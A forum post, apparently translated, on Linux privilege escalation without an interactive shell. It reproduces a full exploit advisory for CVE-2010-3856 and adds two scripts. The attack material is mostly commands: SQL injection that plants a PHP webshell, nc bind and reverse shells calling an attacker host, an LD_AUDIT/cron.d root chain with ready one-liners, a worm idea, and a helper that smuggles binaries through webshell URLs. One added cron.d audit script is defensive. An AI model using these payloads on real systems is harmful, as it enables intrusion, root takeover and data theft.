Linux local privilege escalation in a non-interactive environment, and some reflections

Views 249 | Replies 0 | 2012-4-1 19:17:25
When iptables is locked down very tightly, neither an ICMP/UDP/TCP bindshell nor a connect-back shell will get through, yet you still need local privilege escalation: root the box, then shut iptables off and see whether the access controls can be bypassed (of course, if the other side is running a hardware firewall, what follows will not solve the problem). In that scenario you can consider the non-interactive local privilege escalation method below; other Linux local root exploits may achieve the same, and practice is the best teacher.

Also, root is not always strictly necessary: as nobody, and non-interactively, you can still do a great deal.


As defenders, faced with this scenario, shouldn't we reflect on the following?

1. Defensive controls should be separated from the system being defended, so that even after a successful root, rapid further penetration remains difficult.

2. Against local root exploits, do we have adequate preventive immunity beforehand, detection capability during, and damage-assessment and forensic capability afterwards?
Debian <= 5.0.6 / Ubuntu <= 10.04 Webshell-Remote-Root

# Exploit Title: Debian <= 5.0.6 / Ubuntu <= 10.04 Webshell-Remote-Root
# Date: 24-10-2010
# Author: jmit
# Mail: fhausberger[at]gmail[dot]com
# Tested on: Debian 5.0.6
# CVE: CVE-2010-3856


-----| DISCLAIMER |-----

# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


---| ABOUT |---

Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln). See http://www.exploit-db.com/exploits/15304/. Should work on other Linux distros too.


-----| BACKGROUND |-----

Typically it isn't possible to use a suid shell or modify /etc/passwd directly after webshell access (user nobody) to gain root access. But with the DSO vuln we can launch commands as root, and we can create a socket and connect back to the user or set up a bind shell.


----| EXPLOIT |----

After you have found a SQL-Injection vuln you can create a php backdoor. This is typically possible with a select ... into dumpfile/outfile statement. The value is a simple <? passthru($_GET['c']); ?> backdoor.

---
DROP TABLE IF EXISTS `fm`;
-- TYPE= is the pre-5.5 MySQL spelling of ENGINE=
CREATE TABLE `fm` (`fm` longblob) TYPE=MyISAM;
-- the hex literal is the bytes of: <? passthru($_GET['c']); ?>
insert into fm(fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
drop table fm;
flush logs;
---

Now you can connect to the server and create a connection with telnet, nc, write a binary with perl -e 'print "\x41\x42\x43\x44"', echo -en '\x41\x42\x43\x44', ... If direct shell access isn't possible you can use php code to create your own binary with php fwrite:

---
<?php
$File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "\x41\x42\x43\x44";   // raw bytes of the binary to drop
fwrite($Handle, $Data);
fclose($Handle);
?>
---

Now use

Bind-Shell:    http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

in your web browser and connect to your shell

$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

---

Now let's exploit the DSO vuln. You need umask 0 for correct rw-rw-rw creation of the exploit file /etc/cron.d/exploit.

$ umask 0

This is the shell script for the cron.d entry.

Bind-Shell:    echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
Reverse-Shell: echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh

Now make your shell script executable for cron:

$ chmod u+x /tmp/exploit.sh

Create a rw-rw-rw file in the cron directory using the setuid ping program:

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

Launch a suid root shell every minute:

$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

Now you have a root shell every minute.

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)


-------| EXPLOIT one line |-------

echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh; /bin/chmod 0744 /tmp/exploit.sh; umask 0; LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping; echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)


----------| EXPLOIT from webshell only |----------

http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0; LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)


-----------| EXPLOIT from webshell one line |-----------

http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh; /bin/chmod 0744 /tmp/exploit.sh; umask 0; LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping; echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)


---| IDEAS |---

Looks like a wormable bug. The URL-obfuscated (IDS/IPS) worm searches for SQLI/BSQLI bugs or remote code execution bugs. Then the worm injects the evil URL and does the same for other IPs. It installs a rootkit-bot and the game is over. (c) Offensive Security 2010
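On the defender's side of the reflection above (detection during, forensics after), the chain in the advisory leaves two concrete artifacts: a file in /etc/cron.d created with mode rw-rw-rw by a setuid binary under umask 0, and a cron line that runs a script staged in /tmp as root. The following audit script is an added example, not part of the original post or of jmit's advisory. The directory layout, the sample entries and the finding labels are this example's own assumptions; it builds a throwaway cron.d-style directory so it runs offline, and takes a real path such as /etc/cron.d as its only argument.

```shell
#!/bin/sh
# Added example (not from the post or the advisory): audit a cron.d-style
# directory for the artifacts the CVE-2010-3856 chain leaves behind:
#   1. a world-writable entry (created 0666 by the setuid program under umask 0)
#   2. a job that runs, as root, a script staged in /tmp, /var/tmp or /dev/shm
# Sample data below is constructed; labels and helper names are this example's.

# Print one line per finding, then the number of findings on the last line.
audit_crond() {
    dir="$1"
    n=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # -perm -0002: "other write" bit set (portable, unlike stat -c '%a').
        # On a live system add -user root: a root-owned 0666 file is the tell.
        if [ -n "$(find "$f" -perm -0002 2>/dev/null)" ]; then
            echo "WORLD_WRITABLE $f"
            n=$((n + 1))
        fi
        # Non-comment line, a 'root' user field, then a command in a staging dir.
        if grep -Eq '^[^#].*[[:space:]]root[[:space:]]+(/tmp|/var/tmp|/dev/shm)/' "$f"; then
            echo "ROOT_JOB_FROM_TMP $f"
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# Only the count, for scripting and for the checks below.
count_findings() {
    audit_crond "$1" | tail -n 1
}

# Constructed sample: one benign 0644 entry and one shaped like the
# advisory's /etc/cron.d/exploit (0666, runs /tmp/exploit.sh as root).
make_sample_crond() {
    d=$(mktemp -d)
    printf '%s\n' '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' > "$d/logrotate"
    chmod 644 "$d/logrotate"
    printf '%s\n' '*/1 * * * * root /tmp/exploit.sh' > "$d/exploit"
    chmod 666 "$d/exploit"
    echo "$d"
}

# Usage: sh audit_crond.sh /etc/cron.d
if [ "${1:-}" ]; then
    audit_crond "$1"
fi
```

The world-writable check is the one that survives attacker clean-up least often: the cron line can be edited away, but the 0666 mode on a root-owned file in /etc/cron.d is exactly what the LD_AUDIT trick produced, and cron itself does not care about it, so it stays until someone fixes it.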
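The advisory's perl -e / echo -en / PHP fwrite step (dropping /tmp/nc byte by byte) is the part of the chain that has to work through a one-shot, non-interactive channel such as the webshell's c= parameter. The generator below is an added example, not code from the post or from the advisory, and it generalizes that step: it turns any file into printf(1) commands that recreate it byte for byte, splits them into chunks so each fits a GET parameter, and uses octal escapes because POSIX printf only guarantees \ddd (the \xHH form the advisory uses is a bash/GNU extension that dash's printf and echo do not accept). The function names, the chunk size and the 256-byte sample file are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the post or the advisory): encode a file as printf(1)
# commands for delivery through a non-interactive command channel.

# Emit one "printf '...' > DEST" command per chunk of PER bytes (first chunk
# truncates with >, later chunks append with >>). Every byte becomes a
# 3-digit octal escape, so the format string never contains a raw %, quote
# or backslash and needs no further quoting.
file_to_printf() {
    file="$1"; dest="$2"; per="${3:-512}"
    fmt=""; i=0; redir=">"
    for o in $(od -An -v -t o1 "$file"); do   # od prints e.g. "101 102 103"
        fmt="$fmt\\$o"
        i=$((i + 1))
        if [ "$i" -eq "$per" ]; then
            printf "printf '%s' %s %s\n" "$fmt" "$redir" "$dest"
            fmt=""; i=0; redir=">>"
        fi
    done
    if [ -n "$fmt" ]; then
        printf "printf '%s' %s %s\n" "$fmt" "$redir" "$dest"
    fi
}

# Rebuild SRC through the generated commands (16-byte chunks) and report
# "yes" if the copy is byte-identical, "no" otherwise.
roundtrip_ok() {
    src="$1"; out=$(mktemp)
    file_to_printf "$src" "$out" 16 | sh
    if cmp -s "$src" "$out"; then echo yes; else echo no; fi
    rm -f "$out"
}

# Constructed sample: all 256 byte values, so NUL, '%', quotes and
# backslashes are all exercised.
make_sample_binary() {
    f=$(mktemp)
    i=0
    while [ "$i" -lt 256 ]; do
        printf "\\$(printf '%03o' "$i")" >> "$f"
        i=$((i + 1))
    done
    echo "$f"
}

# Usage: sh file_to_printf.sh ./nc /tmp/nc 400 > commands.txt
if [ "${1:-}" ] && [ "${2:-}" ]; then
    file_to_printf "$1" "$2" "${3:-512}"
fi
```

Each emitted line is four characters per input byte plus the redirection, so pick the chunk size from the server's URL length limit, URL-encode the line (the quotes, > and backslashes are not safe in a query string), and finish with chmod +x and a size or checksum comparison against the original before trusting the dropped binary.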